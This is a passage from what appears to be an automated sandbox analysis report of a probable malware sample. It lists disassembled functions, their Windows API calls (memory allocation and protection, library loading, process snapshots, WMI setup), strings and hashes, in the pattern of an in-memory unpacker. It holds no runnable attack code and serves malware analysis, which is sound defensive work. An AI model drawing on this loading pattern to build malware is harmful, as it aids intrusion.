                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                    • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                                                    • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                                                                                                                                                                                    Function 0043CD60 Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                                                                                                    • String ID: ihgf
                                                                                                                                                                                                                                                                    • API String ID: 2994545307-2948842496
                                                                                                                                                                                                                                                                    • Opcode ID: dc78d9af145ba0afec033d80e05627e4c530122498a0d20b58ff3d4b62c44d01
                                                                                                                                                                                                                                                                    • Instruction ID: fada9a9e4b2345b6e6448840249a942183f34978708c931c01a97142677ee2ca
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dc78d9af145ba0afec033d80e05627e4c530122498a0d20b58ff3d4b62c44d01
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4C31F434304300AFE7109B249CC2B7BBBA5EB8EB14F24653DF584A3391D265EC60874A
                                                                                                                                                                                                                                                                    Function 0043B05B Relevance: .1, Instructions: 136COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 4b87544a561184a7d4b1543d2ac67acc99fdb29ef1ee15d58e3a116105f186d8
                                                                                                                                                                                                                                                                    • Instruction ID: 59f44d745d542156a41113c6a864a29fdb0868418a705d17f35015423a5ff240
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4b87544a561184a7d4b1543d2ac67acc99fdb29ef1ee15d58e3a116105f186d8
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F418C76A587588FC724AF54ACC477BB3A1EB8A320F2E552DDAE517351E7648C0083CD
                                                                                                                                                                                                                                                                    Function 0249003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 0 249003c-2490047 1 2490049 0->1 2 249004c-2490263 call 2490a3f call 2490e0f call 2490d90 VirtualAlloc 0->2 1->2 17 249028b-2490292 2->17 18 2490265-2490289 call 2490a69 2->18 20 24902a1-24902b0 17->20 22 24902ce-24903c2 VirtualProtect call 2490cce call 2490ce7 18->22 20->22 23 24902b2-24902cc 20->23 29 24903d1-24903e0 22->29 23->20 30 2490439-24904b8 VirtualFree 29->30 31 24903e2-2490437 call 2490ce7 29->31 32 24904be-24904cd 30->32 33 24905f4-24905fe 30->33 31->29 35 24904d3-24904dd 32->35 36 249077f-2490789 33->36 37 2490604-249060d 33->37 35->33 42 24904e3-2490505 LoadLibraryA 35->42 40 249078b-24907a3 36->40 41 24907a6-24907b0 36->41 37->36 43 2490613-2490637 37->43 40->41 44 249086e-24908be LoadLibraryA 41->44 45 24907b6-24907cb 41->45 46 2490517-2490520 42->46 47 2490507-2490515 42->47 48 249063e-2490648 43->48 52 24908c7-24908f9 44->52 49 24907d2-24907d5 45->49 50 2490526-2490547 46->50 47->50 48->36 51 249064e-249065a 48->51 53 2490824-2490833 49->53 54 24907d7-24907e0 49->54 55 249054d-2490550 50->55 51->36 56 2490660-249066a 51->56 57 24908fb-2490901 52->57 58 2490902-249091d 52->58 64 2490839-249083c 53->64 59 24907e2 54->59 60 24907e4-2490822 54->60 61 24905e0-24905ef 55->61 62 2490556-249056b 55->62 63 249067a-2490689 56->63 57->58 59->53 60->49 61->35 65 249056d 62->65 66 249056f-249057a 62->66 67 249068f-24906b2 63->67 68 2490750-249077a 63->68 64->44 69 249083e-2490847 64->69 65->61 71 249059b-24905bb 66->71 72 249057c-2490599 66->72 73 24906ef-24906fc 67->73 74 24906b4-24906ed 67->74 68->48 75 2490849 69->75 76 249084b-249086c 69->76 83 24905bd-24905db 71->83 72->83 77 249074b 73->77 78 24906fe-2490748 73->78 74->73 75->44 76->64 77->63 78->77 83->55
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0249024D
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                                                                                                                    • String ID: cess$kernel32.dll
                                                                                                                                                                                                                                                                    • API String ID: 4275171209-1230238691
                                                                                                                                                                                                                                                                    • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                                    • Instruction ID: 399dcb6eb3918c0fda0455d7dbc85658349493339161d9849fa38a55beedf806
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D2525874A01229DFDB64CF58C984BA9BBB1BF09314F1480DAE94DAB351DB30AE95CF14
                                                                                                                                                                                                                                                                    Function 0043AB0B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 123 43ab0b-43ab1f 124 43ab20-43ab7b 123->124 124->124 125 43ab7d-43abce GetForegroundWindow call 43c7d0 124->125
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetForegroundWindow.USER32 ref: 0043AB9F
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ForegroundWindow
                                                                                                                                                                                                                                                                    • String ID: ilmn
                                                                                                                                                                                                                                                                    • API String ID: 2020703349-1560153188
                                                                                                                                                                                                                                                                    • Opcode ID: 8bf5be419e97d4aeba59362ee4405b63177e9ea72d340c76fc1dbd34a7535713
                                                                                                                                                                                                                                                                    • Instruction ID: 381210f78ea322f673374cf03a2ab6eba84d6d5afac1efb59df7821204f613f6
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8bf5be419e97d4aeba59362ee4405b63177e9ea72d340c76fc1dbd34a7535713
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A0115C3BE5A65087D304DB65D806156B293EAC5214F0DD53DC986D770AEF3DDC028286
                                                                                                                                                                                                                                                                    Function 008CA66E Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 129 8ca66e-8ca687 130 8ca689-8ca68b 129->130 131 8ca68d 130->131 132 8ca692-8ca69e CreateToolhelp32Snapshot 130->132 131->132 133 8ca6ae-8ca6bb Module32First 132->133 134 8ca6a0-8ca6a6 132->134 135 8ca6bd-8ca6be call 8ca32d 133->135 136 8ca6c4-8ca6cc 133->136 134->133 139 8ca6a8-8ca6ac 134->139 140 8ca6c3 135->140 139->130 139->133 140->136
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 008CA696
                                                                                                                                                                                                                                                                    • Module32First.KERNEL32(00000000,00000224), ref: 008CA6B6
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433571436.00000000008C9000.00000040.00000020.00020000.00000000.sdmp, Offset: 008C9000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8c9000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3833638111-0
                                                                                                                                                                                                                                                                    • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                                    • Instruction ID: 0a8b1b7dc1138120948f04ff3d988b12f929e21423baebd51c9ed8e9792178d7
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CFF062321007186BD7242AF9988DF6A76F8FF59768F14452CE646D14C0DB70EC454A62
                                                                                                                                                                                                                                                                    Function 02490E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 142 2490e0f-2490e24 SetErrorMode * 2 143 2490e2b-2490e2c 142->143 144 2490e26 142->144 144->143
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • SetErrorMode.KERNELBASE(00000400,?,?,02490223,?,?), ref: 02490E19
                                                                                                                                                                                                                                                                    • SetErrorMode.KERNELBASE(00000000,?,?,02490223,?,?), ref: 02490E1E
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorMode
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2340568224-0
                                                                                                                                                                                                                                                                    • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                                    • Instruction ID: 222b95ba1efed397dc51e845e48fe434b558f4b478ecd050a5280b6dec76a593
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 20D0123514512877DB002A94DC09BCE7F1CDF05B66F008011FB0DD9180C770954046E5
                                                                                                                                                                                                                                                                    Function 0043A950 Relevance: 1.5, APIs: 1, Instructions: 30memoryCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 238 43a950-43a961 239 43a976-43a988 call 43bf00 RtlReAllocateHeap 238->239 240 43a995-43a996 call 438e70 238->240 241 43a98a-43a993 call 438e30 238->241 242 43a968-43a96f 238->242 249 43a9a0-43a9a2 239->249 248 43a99b-43a99e 240->248 241->249 242->239 242->240 248->249
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,00000000,0040B65C,00000000,?), ref: 0043A982
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                    • Opcode ID: 2eba5718b67ec1480271e2bf1c34f5bd19b8968588a838e869f4d5b9ea06510f
                                                                                                                                                                                                                                                                    • Instruction ID: 722538be6ec62bdfb2320af1aff19aeee9eb7e72755357ed04131fae2c05cc9a
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2eba5718b67ec1480271e2bf1c34f5bd19b8968588a838e869f4d5b9ea06510f
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 99E0E576414611FBC6001B24BC06B1B3665AF8A721F02183AF440E6115DA38E811859F
                                                                                                                                                                                                                                                                    Function 0043AB91 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 250 43ab91-43aba8 GetForegroundWindow call 43c7d0 253 43abad-43abce 250->253
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetForegroundWindow.USER32 ref: 0043AB9F
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ForegroundWindow
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2020703349-0
                                                                                                                                                                                                                                                                    • Opcode ID: a0dc0220c6c2ddb49d889c1027b5b2c34b58d9f1c75a0e80b2e5e3c572fe071b
                                                                                                                                                                                                                                                                    • Instruction ID: 60e8b0f46bfb036eff5fe615915129b1fb2bd173e47bf556a6606a5c449cc706
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a0dc0220c6c2ddb49d889c1027b5b2c34b58d9f1c75a0e80b2e5e3c572fe071b
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 34E08C7EA406008BDB04DF20EC4A5517766B79A305B084039D903C37A6DB3DD816CA49
                                                                                                                                                                                                                                                                    Function 00438E70 Relevance: 1.5, APIs: 1, Instructions: 13memoryCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 255 438e70-438e7c 256 438e83-438e8e call 43bf00 RtlFreeHeap 255->256 257 438e94-438e95 255->257 256->257
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • RtlFreeHeap.NTDLL(?,00000000,?,004127C7), ref: 00438E8E
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: FreeHeap
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3298025750-0
                                                                                                                                                                                                                                                                    • Opcode ID: 768fcb1c02373f70ae0863a28d25f36a016012181a68bd02bcb189957d430873
                                                                                                                                                                                                                                                                    • Instruction ID: 85901e1c641484a1e9593b863e702362ecf9fc70d5eef9c3d2e46bbe4163b786
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 768fcb1c02373f70ae0863a28d25f36a016012181a68bd02bcb189957d430873
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 63D01235405526EBC6101F24FC06B863A54EF49321F030461B540AF076C734DC908AD8
                                                                                                                                                                                                                                                                    Function 00438E47 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 260 438e47-438e4a 261 438e51-438e55 RtlAllocateHeap 260->261
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(?,00000000), ref: 00438E55
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                    • Opcode ID: bde11014aa9fadb2486ac873e4c51e0b14130d9e3c259129d8d0e778167120a1
                                                                                                                                                                                                                                                                    • Instruction ID: 4c59684187f8c9fc8ebab3782fe1e1f4842940d007367fb0e8ab7bd4dbd8a192
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bde11014aa9fadb2486ac873e4c51e0b14130d9e3c259129d8d0e778167120a1
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A0C0927C142211FBD2211B21AC5EF6B3E38FB83B63F104124F209580B287649011DA6E
                                                                                                                                                                                                                                                                    Function 00438E51 Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(?,00000000), ref: 00438E55
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                    • Opcode ID: 1129b59f0d67bf13eed9448a42768f07b4682826011a39e0f4462efca5d079f4
                                                                                                                                                                                                                                                                    • Instruction ID: 3dd49d49275fbb255d04589a33f94784ad2ffd24471d3276aa8c957077778349
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1129b59f0d67bf13eed9448a42768f07b4682826011a39e0f4462efca5d079f4
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8AA0223C002200EBC2200B20AC0EF2B3E38FB83B23F000030F00C080B283308000CA2E
                                                                                                                                                                                                                                                                    Function 008CA32D Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 008CA37E
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433571436.00000000008C9000.00000040.00000020.00020000.00000000.sdmp, Offset: 008C9000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8c9000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                    • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                                    • Instruction ID: 64d8edb99042e9ac42ccd224a50c858150061f730d794532ce3d7f45a935f748
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7A113C79A00208EFDB01DF98C985E98BBF5EF08750F058094F9489B362D371EA50DF91

                                                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                                                    Function 004361E0 Relevance: 32.1, APIs: 10, Strings: 8, Instructions: 636memorycomCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • CoCreateInstance.OLE32(0043F68C,00000000,00000001,0043F67C), ref: 0043640E
                                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(FA46F8B5), ref: 0043646A
                                                                                                                                                                                                                                                                    • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 004364A7
                                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(w!s#), ref: 004364FB
                                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(A3q5), ref: 004365A1
                                                                                                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00436613
                                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00436775
                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 004367A0
                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 004367A6
                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 004367B3
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: String$AllocFree$Variant$BlanketClearCreateInitInstanceProxy
                                                                                                                                                                                                                                                                    • String ID: A;$BC$C$T'g)$X&c8$Y/9Q$w!s#$z7}9A3q5
                                                                                                                                                                                                                                                                    • API String ID: 2485776651-4124187736
                                                                                                                                                                                                                                                                    • Opcode ID: 1a7a540a913549243f643d940beb1ec8542d667b59db154e60dd983501a017ec
                                                                                                                                                                                                                                                                    • Instruction ID: 522da010f1620deffab12e26d595bfb80e0736a5a48a815d81ab8756012ad252
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1a7a540a913549243f643d940beb1ec8542d667b59db154e60dd983501a017ec
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7112EC72A083019BD314CF28C881B6BBBE5FFC9304F15992DF595DB290D778D9058B9A
                                                                                                                                                                                                                                                                    Function 024B3C9B Relevance: 10.4, Strings: 8, Instructions: 446COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: 4%$>V$>V$<>$EG$IK$UW$|~
                                                                                                                                                                                                                                                                    • API String ID: 0-2246970021
                                                                                                                                                                                                                                                                    • Opcode ID: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
                                                                                                                                                                                                                                                                    • Instruction ID: 57884115f73a545973cdd85e813ae28e768ac0b03b9150b708654ebc8ab184ab
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E13242B0601B469FDB48CF26D580389BBB1FF45304F548698C9695FB5ADB35A8A2CFC0
                                                                                                                                                                                                                                                                    Function 00423A34 Relevance: 10.4, Strings: 8, Instructions: 446COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
